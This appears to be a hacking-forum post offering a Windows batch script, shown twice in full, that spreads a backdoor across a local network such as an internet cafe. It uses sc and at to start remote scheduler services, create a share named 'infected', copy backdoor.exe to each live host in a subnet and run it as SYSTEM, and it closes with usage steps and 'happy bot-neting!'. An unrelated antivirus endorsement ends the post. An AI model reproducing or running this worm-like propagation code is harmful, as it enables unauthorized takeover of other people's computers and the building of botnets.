A Simple yet Smart Script to spread your malware across a Local Area Network. You can edit the script to do an endless infection-Loop from every PC to EVERY PC, to just completely IGNORE protection systems like DeepFreeze. You don't have to bypass it when the whole LAN is infected with the right tweeks, when a computer comes online, will be infected from the rest of them.
Code:
rem This is a simple script to spread your malware to Local Area Networks
rem such Internet-Caffes etc. It will start the schedule service on
rem every connected Computer remotely, with the help of SC utility.
rem Using the AT command will force every Computer to create a new
rem NetBios Share called "infected" at a given time. It will copy your backdoor to
rem the infected Share, and execute it via the AT command once again.
rem Because of the nature of AT, your backdoor will be executed under
rem SYSTEM\NT rights.
rem HOW TO USE IT:
rem 1 Move the Script on C:\ and rename it to spreader.bat
rem 2 Move the backdoor on C:\ and rename it to "backdoor.exe"
rem 3 Change the prewritten IP's to your's (ipconfig)
rem 4 Double click it... and happy bot-neting!
@Echo off
cls
rem Starting the schedule service Localy first.
sc start schedule
net start schedule
cls
rem Checking the username. Under SYSTEM, the username variable is blank.
if not "%USERNAME%"=="" (
rem Sometimes we can't use SC, but SYSTEM can.
rem Insert the current time plus one minute here.
:systemrights
set SYSTIME=
set /P SYSTIME=[SYSTEM]-Give the Priv-Escalation time (hH:mm format): %=%
if "%SYSTIME%"=="" goto systemrights
at %SYSTIME% /interactive cmd.exe /c "start C:\spreader.bat"
echo.
echo If you're lucky, the attack will take place at %SYSTIME% under the SYSTEM account.
echo I'm closing this window for now...
echo.
pause
exit
) ELSE (
goto pwnmebabe
)
:pwnmebabe
rem Here you set WHEN the new share will be created.
echo Current time is: %TIME%
:pwntime
set PWNTIME=
set /P PWNTIME=[SHARE]-Give the Share-Creating time (hH:mm format): %=%
if "%PWNTIME%"=="" goto pwntime
echo.
rem Just to be sure, the second given time, must have 5 minutes diff.
echo Current time is: %TIME%
:pwntimee
set PWNTIMEE=
set /P PWNTIMEE=[OWNAGE]-Give the Backdoor-Execution time (hH:mm format): %=%
if "%PWNTIMEE%"=="" goto pwntimee
echo.
echo I'm ready to spread the shit!
echo.
pause
cls
rem Try to speed-up the infection by attacking only awake Computers
for /L %%j in (1,1,254) do (
ping -n 1 -w 50 109.68.149.%%j >nul
IF ERRORLEVEL 1 (
ECHO Excluding 109.68.149.%%j from the list...
) ELSE (
sc \\109.68.149.%%j start schedule
at \\109.68.149.%%j %PWNTIME% cmd.exe /c "net share infected=C:\windows\"
at \\109.68.149.%%j %PWNTIMEE% cmd.exe /c "start C:\windows\backdoor.exe"
cls
)
)
cls
rem Remember the space of 5 minutes? You'll need it here, to copy the malware. Increase it if you want.
echo Wait until %PWNTIME% and
pause
cls
for /L %%j in (1,1,254) do (
ping -n 1 -w 50 109.68.149.%%j >nul
IF ERRORLEVEL 1 (
ECHO 109.68.149.%%j is offline...
) ELSE (
copy /Y C:\backdoor.exe \\109.68.149.%%j\infected
cls
)
)
cls
echo Simple Spreading Batch Script
echo Author: Kinghackz
echo ----------------------------------------
echo
pause
@Echo on
Hope you enjoyed the script..
Code:
rem This is a simple script to spread your malware to Local Area Networks
rem such Internet-Caffes etc. It will start the schedule service on
rem every connected Computer remotely, with the help of SC utility.
rem Using the AT command will force every Computer to create a new
rem NetBios Share called "infected" at a given time. It will copy your backdoor to
rem the infected Share, and execute it via the AT command once again.
rem Because of the nature of AT, your backdoor will be executed under
rem SYSTEM\NT rights.
rem HOW TO USE IT:
rem 1 Move the Script on C:\ and rename it to spreader.bat
rem 2 Move the backdoor on C:\ and rename it to "backdoor.exe"
rem 3 Change the prewritten IP's to your's (ipconfig)
rem 4 Double click it... and happy bot-neting!
@Echo off
cls
rem Starting the schedule service Localy first.
sc start schedule
net start schedule
cls
rem Checking the username. Under SYSTEM, the username variable is blank.
if not "%USERNAME%"=="" (
rem Sometimes we can't use SC, but SYSTEM can.
rem Insert the current time plus one minute here.
:systemrights
set SYSTIME=
set /P SYSTIME=[SYSTEM]-Give the Priv-Escalation time (hH:mm format): %=%
if "%SYSTIME%"=="" goto systemrights
at %SYSTIME% /interactive cmd.exe /c "start C:\spreader.bat"
echo.
echo If you're lucky, the attack will take place at %SYSTIME% under the SYSTEM account.
echo I'm closing this window for now...
echo.
pause
exit
) ELSE (
goto pwnmebabe
)
:pwnmebabe
rem Here you set WHEN the new share will be created.
echo Current time is: %TIME%
:pwntime
set PWNTIME=
set /P PWNTIME=[SHARE]-Give the Share-Creating time (hH:mm format): %=%
if "%PWNTIME%"=="" goto pwntime
echo.
rem Just to be sure, the second given time, must have 5 minutes diff.
echo Current time is: %TIME%
:pwntimee
set PWNTIMEE=
set /P PWNTIMEE=[OWNAGE]-Give the Backdoor-Execution time (hH:mm format): %=%
if "%PWNTIMEE%"=="" goto pwntimee
echo.
echo I'm ready to spread the shit!
echo.
pause
cls
rem Try to speed-up the infection by attacking only awake Computers
for /L %%j in (1,1,254) do (
ping -n 1 -w 50 109.68.149.%%j >nul
IF ERRORLEVEL 1 (
ECHO Excluding 109.68.149.%%j from the list...
) ELSE (
sc \\109.68.149.%%j start schedule
at \\109.68.149.%%j %PWNTIME% cmd.exe /c "net share infected=C:\windows\"
at \\109.68.149.%%j %PWNTIMEE% cmd.exe /c "start C:\windows\backdoor.exe"
cls
)
)
cls
rem Remember the space of 5 minutes? You'll need it here, to copy the malware. Increase it if you want.
echo Wait until %PWNTIME% and
pause
cls
for /L %%j in (1,1,254) do (
ping -n 1 -w 50 109.68.149.%%j >nul
IF ERRORLEVEL 1 (
ECHO 109.68.149.%%j is offline...
) ELSE (
copy /Y C:\backdoor.exe \\109.68.149.%%j\infected
cls
)
)
cls
echo Simple Spreading Batch Script
echo Author: Kinghackz
echo ----------------------------------------
echo
pause
@Echo on
Hope you enjoyed the script..
Been using Kaspersky protection for a number of years, and I'd recommend this solution to all of you.